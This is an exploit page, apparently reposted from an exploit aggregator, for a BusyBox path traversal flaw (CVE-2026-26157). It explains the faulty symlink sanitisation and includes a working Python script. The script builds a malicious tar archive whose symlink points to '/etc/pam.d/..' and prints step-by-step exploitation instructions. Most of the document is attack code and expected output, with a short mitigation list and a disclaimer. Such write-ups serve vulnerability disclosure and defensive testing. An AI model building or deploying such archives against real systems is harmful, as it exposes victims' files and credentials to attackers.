Share
## https://sploitus.com/exploit?id=PACKETSTORM:220389
# Exploit Title: BusyBox 1.37.0 - Path Traversal 
    # Google Dork: N/A
    # Date: 2026-02-11
    # Exploit Author: Calil Khalil
    # Vendor Homepage: https://busybox.net
    # Software Link: https://busybox.net/downloads/
    # Version: BusyBox 1.36.1, 1.37.0
    # Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19
    # CVE: CVE-2026-26157
    
    """
    BusyBox Path Traversal Vulnerability (CVE-2026-26157)
    
    Description:
    BusyBox archive extraction utilities fail to properly sanitize symlink targets
    containing trailing ".." components. The strip_unsafe_prefix() function in
    archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches
    the 4-character pattern and misses 3-character trailing "/.." sequences.
    
    This allows an attacker to craft malicious archives with symlinks pointing to
    arbitrary filesystem locations, enabling information disclosure through symlink
    traversal.
    
    Affected Components:
    - tar (primary vector)
    - unzip
    - rpm
    - ar
    
    Impact:
    - CVSS Score: 7.8 (HIGH)
    - Arbitrary file read via symlink traversal
    - Information disclosure
    - Credential theft
    
    Root Cause:
    archival/libarchive/unsafe_prefix.c:23
    The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths:
      cp2 = strstr(cp, "/../");  // Only matches "/../", misses "/pam.d/.."
      if (!cp2) break;
    
    Attack Scenario:
    1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/..
    2. Victim extracts archive using BusyBox tar
    3. Symlink created without sanitization
    4. Symlink resolves to /etc directory
    5. Application reading 'sensitive_data' exposes /etc contents
    
    References:
    - https://github.com/calilkhalil/research
    - Red Hat CNA Case: INC3907198
    """
    
    import tarfile
    import sys
    import os
    
    def create_exploit():
        """
        Creates a malicious TAR file exploiting CVE-2026-26157.
        
        The archive contains a symlink with an unsanitized target that
        resolves outside the extraction directory.
        """
        
        exploit_file = 'CVE-2026-26157_exploit.tar'
        
        try:
            with tarfile.open(exploit_file, 'w') as tar:
                # Create symlink with trailing ".." in target path
                # This bypasses strip_unsafe_prefix() pattern matching
                info = tarfile.TarInfo('sensitive_data')
                info.type = tarfile.SYMTYPE
                info.linkname = '/etc/pam.d/..'  # Resolves to /etc
                tar.addfile(info)
            
            print(f"[+] Exploit created: {exploit_file}")
            print(f"\n[*] Exploitation steps:")
            print(f"  1. mkdir test_extraction && cd test_extraction")
            print(f"  2. busybox tar xf ../{exploit_file}")
            print(f"  3. readlink -f sensitive_data")
            print(f"     Expected output: /etc")
            print(f"  4. ls sensitive_data/")
            print(f"     Result: Lists /etc directory contents")
            print(f"\n[!] Impact: Arbitrary directory read via symlink traversal")
            print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)")
            
            return exploit_file
            
        except Exception as e:
            print(f"[-] Error creating exploit: {e}")
            sys.exit(1)
    
    def show_technical_details():
        """Display technical analysis of the vulnerability"""
        
        print("\n" + "="*70)
        print("TECHNICAL ANALYSIS - CVE-2026-26157")
        print("="*70)
        print("\nVulnerable Function:")
        print("  archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()")
        print("\nVulnerable Code Pattern:")
        print("  cp2 = strstr(cp, \"/../\");  // Only matches 4-char sequence")
        print("  if (!cp2) break;")
        print("\nBypass Technique:")
        print("  Path: /etc/pam.d/..")
        print("  Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL")
        print("  Result: Sanitization bypassed, symlink created with original target")
        print("\nExploitation Flow:")
        print("  1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'")
        print("  2. get_header_tar() extracts symlink metadata")
        print("  3. Symlink target NOT sanitized (bypass detected)")
        print("  4. data_extract_all() creates symlink with '/etc/pam.d/..'")
        print("  5. Target resolves: /etc/pam.d/.. -> /etc")
        print("  6. Reading 'sensitive_data' = reading /etc")
        print("="*70 + "\n")
    
    if __name__ == "__main__":
        print("="*70)
        print("BusyBox Path Traversal Exploit - CVE-2026-26157")
        print("Author: Calil Khalil")
        print("="*70)
        
        # Display technical analysis
        show_technical_details()
        
        # Create exploit
        exploit_file = create_exploit()
        
        print("\n[*] Mitigation:")
        print("  - Update BusyBox to patched version")
        print("  - Patch applies strip_unsafe_prefix() to symlink targets")
        print("  - Do not extract untrusted archives with elevated privileges")
        
        print("\n[*] For educational and authorized testing purposes only")